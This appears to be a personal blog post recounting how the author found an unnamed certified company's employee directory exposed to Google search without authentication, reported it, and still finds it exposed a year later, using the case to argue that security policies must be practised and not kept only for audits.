Hi guys, there is this organization that boasts about its standards and policies. Yes, these things are essential for a company's reputation and data security, but they only matter if they are actually implemented in practice.
I have seen many organizations that create policies only for the sake of audit or compliance.
Do you have a policy on data security? YES
Do you have a data security policy implemented in practice? Hmmmm!!!
Companies might be certified and meet the regulatory standards, but nothing is actually in practice.
Let me share an incident with you. I accidentally discovered this in a normal Google search. I searched for something and found an interesting result. Out of curiosity, I clicked on that particular Google search result and it took me to that company's employee directory. The whole directory. I could search for any employee; I could see their employee code, department and location. If you want to know how big the list is: yes, a few thousand.
I first encountered this result more than a year back. I knew some of the guys from that organization and I informed them. Some of them understood its importance and, according to them, they escalated it. I hoped that they had resolved it.
Last week, I saw that same result again in the Google search. Same database.
They are supposed to show this information only once an employee is properly authenticated. Somehow, they are not bothered and show it directly, with no authentication required. I searched about this organization and they hold certifications like ISO 27001 and ISO 9001. They also handle projects for various governments and private firms. Such a big company should have some level of responsibility for keeping employee information secure. This information can be used for social engineering and other privacy misuse. In many countries, this information is considered Personally Identifiable Information (PII), and a breach of it can lead to million-dollar fines. And its reputation will be in question.
So even after one year of being informed, they are not bothered about securing the employee info. This can be called big negligence. Despite being an ISO 27001 certified organization with data security policies, they are not bothered about this data leak. So many questions arise.
- What audit has actually happened, and how were they certified?
- Do they periodically audit their information/data infrastructure?
- Who is responsible if this data is misused?
- Are there enough data security mechanisms for other information, such as customer info and project details?
I discussed this with one person, and he raised this concern with me.
Recent breaches reveal that personal/official and financial data is not as secure as we are told...
But your point puts forward an open-ended question: “can a company secure their client’s data when they can’t secure their employee data?” ...
So what actually matters is: are you really practicing a security policy? Is everyone aware of it?
Do your employees/management have that due care and due diligence?
Have the certifications, but not for accreditation's sake. Have everything in practice rather than boasting.
Note: The data is available on the web and can be found using a Google search. No manipulation and no tools are needed. They reveal their employee info just like that. A technically sound person could manipulate the URL and may spill more info. This was also reported to them; sadly, it seems nobody is bothered. The company name is not mentioned for privacy reasons.